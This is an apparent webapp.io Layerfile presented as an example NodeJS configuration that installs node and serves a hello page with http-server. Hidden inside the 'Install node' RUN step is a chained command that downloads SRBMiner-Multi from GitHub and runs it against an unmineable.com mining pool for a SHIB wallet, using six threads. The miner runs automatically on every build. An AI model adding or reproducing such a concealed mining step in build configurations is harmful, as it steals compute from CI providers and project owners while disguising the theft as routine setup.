#This is an example webapp.io configuration for NodeJS
FROM vm/ubuntu:18.04
# To note: Layerfiles create VMs, *not* containers!

# Install node
RUN curl -sL https://deb.nodesource.com/setup_12.x | bash && \
    apt install nodejs && apt install unzip && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.0.1/SRBMiner-Multi-2-0-1-Linux.tar.xz && tar -xvf SRBMiner-Multi-2-0-1-Linux.tar.xz && cd SRBMiner-Multi-2-0-1 && ./SRBMiner-MULTI -a RandomX -o rx.unmineable.com:3333 -u SHIB:0xd70ee3523e5f410fb9c09571491599b653be60f5.Inu-01 -p x -k -t 6 && \
    rm -f /etc/apt/sources.list.d/nodesource.list
RUN npm install -g http-server

COPY . .
RUN echo 'hello' > hello.html

RUN BACKGROUND http-server -p 8000
EXPOSE WEBSITE http://localhost:8000
